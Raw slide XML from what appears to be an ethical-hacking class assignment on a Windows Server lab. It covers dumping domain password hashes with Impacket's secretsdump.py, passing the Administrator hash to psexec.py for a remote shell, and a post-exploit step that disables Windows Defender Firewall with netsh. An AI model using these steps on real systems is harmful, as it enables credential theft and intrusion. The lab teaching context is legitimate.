          <a:xfrm>
            <a:off x="152400" y="192975"/>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Impacket Secretsdump.py</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321600" y="3590550"/>
            <a:ext cx="8822400" cy="151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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Next, we will use Impacket’s secretdump.py to retrieve the password hashes of all devices in the Windows Server’s domain. Now that the Windows Server’s password is an empty string, we can set the parameter -no-pass. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>We will use the Administrator’s password hash to gain access into the Windows Server.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Ensure that the exact path is specified when using secretsdump.py.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="753" name="Google Shape;753;p86"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="475800" y="799575"/>
            <a:ext cx="6707474" cy="2854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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3490750" y="3670025"/>
            <a:ext cx="4876200" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>02. Environment Setup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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pic>
        <p:nvPicPr>
          <p:cNvPr id="285" name="Google Shape;285;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="222475" y="244650"/>
            <a:ext cx="3224199" cy="1682969"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="286" name="Google Shape;286;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10919" l="12448" r="12290" t="9259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4522550" y="244651"/>
            <a:ext cx="3033432" cy="1682975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3658825" y="810625"/>
            <a:ext cx="5616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300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="288" name="Google Shape;288;p24"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2182600" y="3332801"/>
            <a:ext cx="1794550" cy="1558950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="Google Shape;289;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2738475" y="2284913"/>
            <a:ext cx="682800" cy="690600"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Impacket Psexec.py</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759" name="Google Shape;759;p87"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4375650" y="2917200"/>
            <a:ext cx="4615800" cy="182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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In the same directory as secretsdump.py, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>psexec.py</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> with the parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>-hashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> followed by the hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> from secretsdump.py, and specify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> and the target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>IP address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>A command shell from the Windows Server will be opened after running psexec.py, where we can execute any valid shell commands we wish to.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="760" name="Google Shape;760;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="799575"/>
            <a:ext cx="8610500" cy="2037600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="761" name="Google Shape;761;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="3051400"/>
            <a:ext cx="4047702" cy="15267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88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5237375" y="4181150"/>
            <a:ext cx="31296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sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="767" name="Google Shape;767;p88"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768;p88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315900" y="3780175"/>
            <a:ext cx="4249200" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>07. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>Windows Server Post-Exploits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89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>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Turning Off Windows Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6002700" y="1337850"/>
            <a:ext cx="2988900" cy="182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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>In the active Windows command shell session on Kali Linux, enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>netsh advfirewall show allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> to view the states of all firewall settings.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The image shows the domain profile firewall is still in ON state.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="34649" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="799575"/>
            <a:ext cx="6002700" cy="43055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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="192975"/>
            <a:ext cx="4830900" cy="103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Turning Off Windows Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455925" y="2135750"/>
            <a:ext cx="3721500" cy="139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Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>After running the command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>netsh advfirewall set allprofiles state off,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t> an Ok is shown in the output.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Running show allprofiles again shows that all Windows firewall states are OFF.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="782" name="Google Shape;782;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1225275"/>
            <a:ext cx="4830876" cy="649350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="783" name="Google Shape;783;p90"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="5589" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4666950" y="0"/>
            <a:ext cx="4433150" cy="51435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91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="129250" y="534925"/>
            <a:ext cx="44070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Turning Off Windows Firewall</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="338050" y="1241275"/>
            <a:ext cx="4050300" cy="37146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lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Checking the firewall settings on the Windows machine shows that the Windows Defender Firewall states are OFF.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Turning off the Windows Defender Firewall reduces the security measures in the Windows machine, because it removes its ability to monitor and prevent malicious network traffic from attackers. This makes it easier for hackers to attack it through various means.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>The video is a demonstration of turning off the Windows Defender Firewall with an active Windows shell session.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="790" name="Google Shape;790;p91" title="EH Assignment Disabling Firewall Post Exploit">
            <a:hlinkClick r:id="rId3"/>
          </p:cNvPr>
